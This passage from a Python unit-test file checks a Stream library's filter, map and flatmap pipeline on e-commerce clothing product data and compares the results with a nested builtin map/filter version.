        self.assertEqual(results, ['Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Indcrown Net Embroidered Semi-stitched Lehenga Choli Material',
                                   'Pick Pocket Embroidered Women s Waistcoat',
                                   'Oye Boy s Dungaree',
                                   'Mario Gotze Women s Printed Casual Orange Shirt',
                                   'Reckler Slim Fit Men s Jeans',
                                   'Wrangler Skanders Fit Men s Jeans',
                                   'Roadster Skinny Fit Fit Men s Jeans'])

    def test_fromList_with_map_filter_with_clothing_overallrating_get_reviews(self):
        """Flatten review lists of well-rated clothing into their ratings."""
        is_clothing = lambda product: product['category'] == 'Clothing'
        is_rating_greater_than_three = lambda product: product['overAllRating'] > 3
        reviews_from_product = lambda product: product['reviews']
        rating_from_review = lambda review: review['rating']
        current_method = lambda: (Stream
                                  .create(get_products())
                                  .filter(is_clothing)
                                  .filter(is_rating_greater_than_three)
                                  .flatmap(reviews_from_product)
                                  .map(rating_from_review)
                                  .asList())
        results = profile_method(current_method)
        print("results", results)
        self.assertIsNotNone(results)
        self.assertEqual(results, [5, 1, 2, 2, 1, 3, 2, 1, 2, 5, 1, 4, 1, 5, 5, 1])
        self.assertIn(5, results)
        self.assertIn(1, results)

    def test_fromList_with_map_filter_with_clothing_overallrating_inter(self):
        """Reference implementation of the clothing pipeline with nested
        builtin map/filter; must match the Stream version's output."""
        def current_method():
            return list(map(lambda product: product['name'], filter(lambda product: product['overAllRating'] > 3,
                                                                    filter(lambda product: product[
                                                                        'category'] == 'Clothing',
                                                                        get_products()))))
        results = profile_method(current_method)
        print("results", results)
        self.assertIsNotNone(results)
        self.assertEqual(results, ['Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Alisha Solid Women s Cycling Shorts',
                                   'Indcrown Net Embroidered Semi-stitched Lehenga Choli Material',
                                   'Pick Pocket Embroidered Women s Waistcoat',
                                   'Oye Boy s Dungaree',
                                   'Mario Gotze Women s Printed Casual Orange Shirt',
                                   'Reckler Slim Fit Men s Jeans',
                                   'Wrangler Skanders Fit Men s Jeans',
                                   'Roadster Skinny Fit Fit Men s Jeans'])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.